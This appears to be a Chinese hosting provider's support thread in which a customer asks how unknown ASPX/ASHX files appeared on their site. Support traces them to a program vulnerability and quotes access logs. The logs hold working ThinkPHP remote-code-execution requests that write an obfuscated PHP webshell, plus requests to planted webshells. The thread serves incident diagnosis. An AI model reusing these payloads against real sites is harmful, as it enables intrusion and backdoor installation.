问:麻烦帮忙查一下.
heiyu/class.aspx
heiyu/hei.ashx
这2个文件是怎么出现的.是通过FTP上传的还是通过某个文件进行创建的?,麻烦帮忙查一下这个文件是怎么出现的是通过上传的还是通过某个文件
问:links.asp
还有这4个文件.
答:您好,我们检查了,不是通过ftp进来的, 是您程序漏洞的方式。文件的创建时间基本和这些注入时间吻合(windows系统日志要加8才是北京时间),请及时联系程序方检查清理,并及时修补程序漏洞,网站访问日志存放在您空间,是17号入侵的,非常感谢您长期对我司的支持!
07:25:54 POST /heiyu/hei.ashx dir=Dick – 127.0.0.1 HTTP/1.1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0 http://www.bjwnht.com.cn/heiyu/hei.ashx?dir=Dick 200 456 3390
05:32:51 GET / s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=fkyot.php&content=%3C?php%20print(md;$a=str_replace(%22vbnm%22,%22%22,%22asvbnmsert%22);@$a($_POST%5Bysy%5D);?%3Eysydjsjxbei37 – 127.0.0.1 HTTP/1.1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2) http://www.bjwnht.com.cn/?s=index/\\think\\template\\driver\\file/write&cacheFile=fkyot.php&content=<?php print(md;$a=str_replace("vbnm","","");@$a($_POST[ysy]);?> 200 63913 1625
05:32:53 GET / s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=imbok.php&vars%5B1%5D%5B%5D=%3C?php%20print(md;$a=str_replace(%22vbnm%22,%22%22,%22asvbnmsert%22);@$a($_POST%5Bysy%5D);?%3Eysydjsjxbei37$ – 127.0.0.1 HTTP/1.1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2) http://www.bjwnht.com.cn/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=imbok.php&vars[1][]=<?php print(md;$a=str_replace("vbnm","","");@$a($_POST[ysy]);?>ysydjsjxbei37$ 200 64085 1625
07:25:54 POST /heiyu/hei.ashx dir=Dick – 127.0.0.1 HTTP/1.1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0 http://www.bjwnht.com.cn/heiyu/hei.ashx?dir=Dick 200 456 3390
问:fukun.aspx 这个不是我们的文件. 应该是这个文件导致创建了下面的这些文件. 问题是 这个文件是2015年的?? 这个不太可能吧? 能不能查到这个文件是怎么来的.通过FTP的吗. 还是由什么文件创建的?
答:您好,这些文件都是5月14日建立的。
但这个文件早在5月1日就有访问请求记录,我们查过了都不是通过ftp方式上传的,只能说明您网站被篡改以后一直没有清理干净,所以才会导致反复被挂马。现在最好的办法就是重新上传全新的程序,如果再次被挂马,可以再来检查分析入侵点,非常感谢您长期对我司的支持!
11:01:42 GET /heiyu/guanli/fukun.aspx u=Damo – 127.0.0.1 HTTP/1.1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0 – 200 1178 3265
问:感谢你. 已经清理. 我再观察一下
答:您好,好的,若还有其他需要,请及时联系反馈,非常感谢您长期对我司的支持!
西部数码(west.cn)是经工信部、ICANN、CNNIC认证审批,持有ISP、云牌照、IDC、CDN、顶级域名注册商等全业务资质的正规老牌服务商,自成立至今20余年专注于域名注册、虚拟主机、云服务器、企业邮箱、企业建站等互联网基础服务!
截止目前,已经为超过2000万个域名提供了注册、解析等服务,是中国五星级域名注册注册商!已为超过50万个网站提供了高速稳定的云托管服务,获评中国最受用户喜欢云主机服务商。
西部数码提供全方位7X24H专业售后支撑,域名注册特价1元起,高速稳定云主机45元起,更多详情请浏览西部数码官网:https://www.west.cn/
